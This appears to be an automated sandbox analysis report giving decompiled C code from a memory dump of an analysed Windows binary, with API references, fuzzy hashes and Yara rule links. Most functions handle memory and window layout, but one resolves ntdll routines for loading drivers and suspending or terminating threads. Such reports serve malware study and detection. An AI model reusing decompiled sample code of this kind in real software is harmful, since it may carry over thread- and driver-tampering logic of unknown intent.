Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

0x004068ec
0x004068f0
0x004068f4
0x004068ff
0x00406902
0x0040690a
0x00406910
0x00406911
0x0040691b
0x0040691e
0x00406923
0x0040692d
0x0040692e
0x00406933
0x0040693d
0x00406940
0x00406949
0x0040694a
0x00406950
0x00406956
0x00406959
0x0040695c
0x00406964
0x0040696d
0x00406974
0x0040697e
0x00406989
0x00406990
0x00406998
0x0040699b
0x0040699f
0x004069b8
0x004069bc
0x004069c4
0x004069c7
0x004069c7
0x004069cb
0x004069ce
0x004069d4
0x004069d4
0x004069d9
0x004069df
0x004069e6
0x004069ea
0x004069ef
0x004069f2
0x004069f5
0x00406a00
0x00406a01
0x00406a06
0x00406a08
0x00406a0b
0x00406a10
0x00406a16
0x00406a25
0x00406a25
0x00406a18
0x00406a1e
0x00406a1e
0x00406a27
0x00406a2f
0x00406a32
0x00406a35
0x00406a3b
0x00406a41
0x00406a47
0x00406a4d
0x00406a53
0x00406a5d
0x00406a6d

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

0x004097b1
0x004097b9
0x004097bb
0x004097be
0x004097c3
0x004097ca
0x004097de
0x004097de
0x004097e3
0x004097e5
0x004097e5
0x004097ec
0x004097f3
0x004097f6
0x004097fe
0x00409802
0x00409805
0x0040980a
0x0040980d
0x00409810
0x00409822
0x00000000
0x00409827
0x0040982a
0x004098da
0x004098da
0x004098dc
0x004098e0
0x004098e9
0x004098ec
0x004098f6
0x004098f6
0x004098e2
0x00000000
0x004098e2
0x00409830
0x00409833
0x00409838
0x0040983b
0x0040983e
0x0040985f
0x0040985f
0x00409861
0x00409863
0x0040989e
0x004098b1
0x004098b8
0x004098c0
0x004098c5
0x004098d5
0x00409865
0x00409865
0x00409865
0x0040986c
0x00409878
0x0040987f
0x0040988a
0x0040988f
0x0040988f
0x0040986c
0x00000000
0x00409863
0x00409840
0x00409843
0x00409846
0x0040984b
0x00409852
0x00000000
0x00000000
0x00409854
0x0040985d
0x00000000
0x00000000
0x00000000
0x0040985d
0x00409894
0x00000000
0x00409894

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

0x004067ac
0x004067af
0x004067b5
0x004067ba
0x004067bf
0x004067c1
0x004067c6
0x004067c7
0x004067cc
0x004067cd
0x004067d2
0x004067d4
0x004067d9
0x004067da
0x004067df
0x004067e0
0x004067e5
0x004067e7
0x004067ec
0x004067ed
0x004067f2
0x004067f3
0x004067f8
0x004067fa
0x004067ff
0x00406800
0x00406805
0x00406806
0x00406808
0x0040680f
0x00406810
0x00406812
0x00406817
0x0040681e
0x00406828
0x0040682b
0x0040682c
0x0040681e
0x00406835
0x00406839
0x00406841

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

0x004083dc
0x004083e2
0x004083e9
0x004083ea
0x004083eb
0x004083f3
0x004083f6
0x004083f8
0x00408401
0x00408404
0x00408407
0x00408409
0x0040840c
0x00408413
0x0040841d
0x00408427
0x0040842c
0x0040842f
0x00408432
0x00408435
0x00408438
0x00408439
0x0040843e
0x0040843f
0x00408442
0x0040844a

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

0x00406746
0x00406746
0x0040674f
0x00406751
0x00406752
0x00406757
0x00406758
0x0040675d
0x0040675f
0x00406760
0x00406765
0x00406766
0x0040676e
0x00406770
0x00406771
0x00406776
0x00406777
0x0040677f
0x00406781
0x00406785
0x00406787
0x00406788
0x0040678e
0x0040678e
0x00406790
0x00406791
0x00406796
0x00406798
0x0040679e
0x004067a1
0x004067a4
0x004067ab

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

0x0040aba8
0x0040aba9
0x0040abb0
0x0040abb2
0x0040abb5
0x0040ac19
0x0040ac2c
0x0040ac2e
0x0040ac36
0x0040ac39
0x0040ac39
0x0040ac1b
0x0040ac21
0x0040ac21
0x0040abb7
0x0040abcb
0x0040abce
0x0040abd7
0x0040abe6
0x0040abf6
0x0040abfe
0x0040ac09
0x0040ac0f
0x0040ac12
0x0040ac4f

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

